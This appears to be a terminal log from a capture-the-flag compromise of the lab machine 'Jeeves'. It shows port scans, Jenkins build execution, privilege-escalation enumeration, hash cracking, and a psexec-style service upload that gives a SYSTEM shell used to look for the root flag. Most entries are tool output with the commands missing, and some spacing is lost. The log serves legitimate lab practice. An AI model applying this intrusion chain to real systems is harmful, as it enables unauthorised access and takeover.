┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p- --min-rate=200010.10.10.63 -oG allports -Pn Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:01 CST Nmap scan report for10.10.10.63 Host is up (0.37s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 50000/tcp open ibm-db2
Nmap done: 1 IP address (1 host up) scanned in 100.73 seconds
┌──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p80,135,445,50000 -sC -sV --min-rate=200010.10.10.63 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 07:07 CST Nmap scan report for10.10.10.63 Host is up (0.24s latency).
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Ask Jeeves |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 135/tcp filtered msrpc 445/tcp filtered microsoft-ds 50000/tcp filtered ibm-db2 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 46.08 seconds
Started by user anonymous Building in workspace C:\Users\Administrator\.jenkins\workspace\test1 [test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins7419465613522893143.bat
Started by user anonymous Building in workspace C:\Users\Administrator\.jenkins\workspace\test1 [test1] $ cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins4410486682208148338.bat
Pinging 10.10.14.39 with 32 bytes of data: Reply from 10.10.14.39: bytes=32 time=135ms TTL=63 Reply from 10.10.14.39: bytes=32 time=239ms TTL=63 Reply from 10.10.14.39: bytes=32 time=136ms TTL=63 Reply from 10.10.14.39: bytes=32 time=246ms TTL=63
Ping statistics for10.10.14.39: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 135ms, Maximum = 246ms, Average = 189ms
? Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups Current user: kohsuke Current groups: Domain Users, Everyone, Users, Service, Console Logon, Authenticated Users, This Organization, Local account, Local, NTLM Authentication =================================================================================================
JEEVES\Administrator: Built-in account for administering the computer/domain |->Groups: Administrators |->Password: CanChange-NotExpi-Req
JEEVES\DefaultAccount(Disabled): A user account managed by the system. |->Groups: System Managed Accounts Group |->Password: CanChange-NotExpi-NotReq
JEEVES\Guest(Disabled): Built-in account for guest access to the computer/domain |->Groups: Guests |->Password: NotChange-NotExpi-NotReq
? Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes cmd(3692)[C:\Windows\SysWOW64\cmd.exe] -- POwn: kohsuke Command Line: cmd /c call C:\Users\kohsuke\AppData\Local\Temp\jenkins1222239407732559434.bat
* Append -w 3 to the commandline. This can cause your screen to lag.
* Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sun Apr 2800:22:412024 Stopped: Sun Apr 2800:22:592024
[*] Requesting shares on 10.10.10.63..... [*] Found writable share ADMIN$ [*] Uploading file STnNhPDV.exe [*] Opening SVCManager on 10.10.10.63..... [*] Creating service LIeY on 10.10.10.63..... [*] Starting service LIeY..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whomai 'whomai' is not recognized as an internal or external command, operable program or batch file.
C:\Windows\system32> whoami nt authority\system
C:\Windows\system32> cat C:/Users/Administrator/Desktop/root.txt 'cat' is not recognized as an internal or external command, operable program or batch file.
C:\Windows\system32> C:\Windows\system32> whoami nt authority\system
C:\Windows\system32> type C:/Users/Administrator/Desktop/root.txt The syntax of the command is incorrect.
C:\Windows\system32> cd C:/Users/Administrator/Desktop/
C:\Users\Administrator\Desktop> ls 'ls' is not recognized as an internal or external command, operable program or batch file.
C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/201710:05 AM <DIR> . 11/08/201710:05 AM <DIR> .. 12/24/201703:51 AM 36 hm.txt 11/08/201710:05 AM 797 Windows 10 Update Assistant.lnk 2 File(s) 833 bytes 2 Dir(s) 2,582,810,624 bytes free
C:\Users\Administrator\Desktop> type hm.txt The flag is elsewhere. Look deeper. C:\Users\Administrator\Desktop> dir /Ah Volume in drive C has no label. Volume Serial Number is 71A1-6FA1